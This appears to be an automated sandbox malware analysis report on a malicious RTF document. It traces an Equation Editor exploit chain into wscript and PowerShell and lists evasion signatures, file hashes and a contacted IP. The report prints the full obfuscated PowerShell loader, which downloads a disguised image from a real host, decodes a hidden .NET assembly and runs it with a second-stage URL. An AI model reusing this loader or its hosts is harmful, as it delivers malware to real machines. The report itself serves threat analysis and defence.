Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 780			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2344			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1812	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3180	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3304	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3308	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3280	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3424	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_035106C2 mov edx, dword ptr fs:[00000030h]

2_2_035106C2

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 91.92.254.29 80

Jump to behavior

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 3200, type: MEMORYSTR

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS"			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"			Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command ". ( $verbosepreference.tostring()[1,3]+'x'-join'')( (('94ylink = ykohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235yko; 94ywebclient = new-object system.net.webclie'+'nt; try { 94ydownloadeddata = 94ywebclient.downloaddata(94ylink) } catch { write-host ykofailed to download data from 94ylinkyko -foregroundcolor red; ex'+'it }; if (94ydownloadeddata -ne 94ynull) { 94'+'yimagetext = ['+'system.text.encoding]::utf8.getstring(94ydownload'+'eddata); 94ystartflag = yko<<base64_start>>yko;'+' 94yendflag '+'= yko<<base64_end>>yko; 94ystartindex = 94yimagetext.indexof(94ystartflag); 94yendindex = 94yimagetext.indexof(94yendflag); if (94ystartindex -ge 0 -and 94yen'+'dindex -gt 94ystartind'+'ex) { 94ystartindex += 94ystartflag.length; 94ybase64length = 94yendindex - 94ystartindex; 94ybase64command = 94yimagetext.substring(94yst'+'a'+'rtindex, 94ybase64length); 94ycommand'+'bytes = [sy'+'st'+'em.convert]::fro'+'mbase64string(94ybase64command); 94yloadedassembly = [system.reflection'+'.assembly]::load(94ycommandbytes); 94ytype = 9'+'4yloadedassembly.gettype(ykorunpe.homeyko); 94ymethod = 94ytype.getmethod(ykovaiyko).invoke('+'94ynull, ['+'object[]] (ykotxt.fdw/11033/61.532.59.32//:ptthyko ,'+' ykodesativadoyko , ykodesativadoyko , ykodesati'+'vadoyko,ykoregasmyko,ykoyko)) } }') -creplace 'yko',[char]39 -creplace([char]57+[char]52+[char]89),[char]36) )"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command ". ( $verbosepreference.tostring()[1,3]+'x'-join'')( (('94ylink = ykohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235yko; 94ywebclient = new-object system.net.webclie'+'nt; try { 94ydownloadeddata = 94ywebclient.downloaddata(94ylink) } catch { write-host ykofailed to download data from 94ylinkyko -foregroundcolor red; ex'+'it }; if (94ydownloadeddata -ne 94ynull) { 94'+'yimagetext = ['+'system.text.encoding]::utf8.getstring(94ydownload'+'eddata); 94ystartflag = yko<<base64_start>>yko;'+' 94yendflag '+'= yko<<base64_end>>yko; 94ystartindex = 94yimagetext.indexof(94ystartflag); 94yendindex = 94yimagetext.indexof(94yendflag); if (94ystartindex -ge 0 -and 94yen'+'dindex -gt 94ystartind'+'ex) { 94ystartindex += 94ystartflag.length; 94ybase64length = 94yendindex - 94ystartindex; 94ybase64command = 94yimagetext.substring(94yst'+'a'+'rtindex, 94ybase64length); 94ycommand'+'bytes = [sy'+'st'+'em.convert]::fro'+'mbase64string(94ybase64command); 94yloadedassembly = [system.reflection'+'.assembly]::load(94ycommandbytes); 94ytype = 9'+'4yloadedassembly.gettype(ykorunpe.homeyko); 94ymethod = 94ytype.getmethod(ykovaiyko).invoke('+'94ynull, ['+'object[]] (ykotxt.fdw/11033/61.532.59.32//:ptthyko ,'+' ykodesativadoyko , ykodesativadoyko , ykodesati'+'vadoyko,ykoregasmyko,ykoyko)) } }') -creplace 'yko',[char]39 -creplace([char]57+[char]52+[char]89),[char]36) )"			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

ID:	1466761
Product:	CloudBasic
Start time:	11:07:53
Start date:	03.07.2024
Sample:	4YlwTsmpuZ.rtf
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	9904916ce3549610216e99d83e7e2135
SHA1:	d5eefab14ee9d5afa6258d3b399b46f779a56901
SHA256:	a887cfb81844497f8f88e558289f89d8edb3f277f142df636f5267cc8263d198
Filetype:	Rich Text Format (5005/1) 55.56%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatideaforfollowers[1].gz	Unicode text, UTF-16, little-endian text, with CRLF line terminators	397C3C538435534590D14E1F5C9149C6	00D4EF9859A20F9CBC444A7AB4E6EDF9BE4D19FB	1F0991AE33597D73D6CF48C3ED6BECE4423BF2393A4E85EB1B84DFE773CD734F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{89CD6143-AF39-4DB2-BD0A-77C70AFAF6C5}.tmp	data	CE338FE6899778AACFC28414F2D9498B	897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1	4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6541E432-FCF8-462E-B89E-94C2D4EFD985}.tmp	data	507E181B72FB351F53791A9966347D20	E9FF7C875EE16ABC6F5E14F8F8AF1F0FE13F1ABF	FE9E7B953C2FEE16F5C923A36CBD71858E8ACC8A9985F1720441D99709455040
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F0D9C1B9-F0D5-4902-9161-FED34811C4AD}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Temp\iznehrzd.ier.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\vjz3rtmh.qm2.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\4YlwTsmpuZ.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Wed Jul 3 08:08:36 2024, length=197186, window=hide	46C8C76E3E5A22FC28944967F20E8A78	9410A1BAB97504122A4EFE18A58E121C74B625CC	D86A4D94C0B29425B4EB8FC2C35F028BCD402E83E2AA1D495F512E28B8CD1CDB
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	Generic INItialization configuration [folders]	5BDAD84EF82636D5736842972516F162	2C47CB9A1C4A9C2550FA2D08402298542C2EE4A5	CE60D29C370CE2649270C029F62D93CAE20DA481C791F92E1949AA5EE8C639E2
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED	95E13378EA9CACA068B2687F01E9EF13F56627C2	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS	Unicode text, UTF-16, little-endian text, with CRLF line terminators	397C3C538435534590D14E1F5C9149C6	00D4EF9859A20F9CBC444A7AB4E6EDF9BE4D19FB	1F0991AE33597D73D6CF48C3ED6BECE4423BF2393A4E85EB1B84DFE773CD734F
C:\Users\user\Desktop\~$lwTsmpuZ.rtf	data	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED	95E13378EA9CACA068B2687F01E9EF13F56627C2	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1

Windows Analysis Report
4YlwTsmpuZ.rtf

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report 4YlwTsmpuZ.rtf

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
4YlwTsmpuZ.rtf